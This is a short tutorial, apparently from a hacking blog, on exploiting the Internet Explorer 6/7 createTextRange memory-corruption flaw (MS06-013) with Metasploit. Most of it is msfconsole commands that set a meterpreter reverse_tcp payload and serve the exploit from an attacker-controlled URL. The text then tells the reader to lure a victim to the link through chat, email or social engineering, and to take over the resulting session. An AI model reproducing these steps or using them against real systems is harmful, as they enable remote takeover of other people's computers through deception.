This module exploits code execution vulnerability in Microsoft Internet Explorer. Both IE6 and IE7 (Beta 2) are vulnerable. It will corrupt memory in a way, which, under certain circumstances, can lead to an invalid/corrupt table pointer dereference. EIP will point to a very remote, non-existent memory location. This module is the result of merging three different exploit submissions and has only been reliably tested against Windows XP SP2. This vulnerability was independently discovered by multiple parties. The heap spray method used by this exploit was pioneered by Skylined.
Exploit Targets
Internet Explorer 6, 7
Windows XP SP2
Windows XP SP3
Requirement
Attacker: Backtrack 5
Victim PC: Windows XP
Open backtrack terminal type msfconsole
Now type use exploit/windows/browser/ms06_013_createtextrange
Msf exploit (ms06_013_createtextrange)>set payload windows/meterpreter/reverse_tcp
Msf exploit (ms06_013_createtextrange)>set lhost 192.168.1.2 (IP of Local Host)
Msf exploit (ms06_013_createtextrange)>set srvhost 192.168.1.2 (This must be an address on the local machine)
Msf exploit (ms06_013_createtextrange)>set uripath newupdates(The Url to use for this exploit)
Msf exploit (ms06_013_createtextrange)>exploit
Now an URL you should give to your victim http://192.168.1.2:8080/newupdates
Send the link of the server to the victim via chat or email or any social engineering technique.
Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“
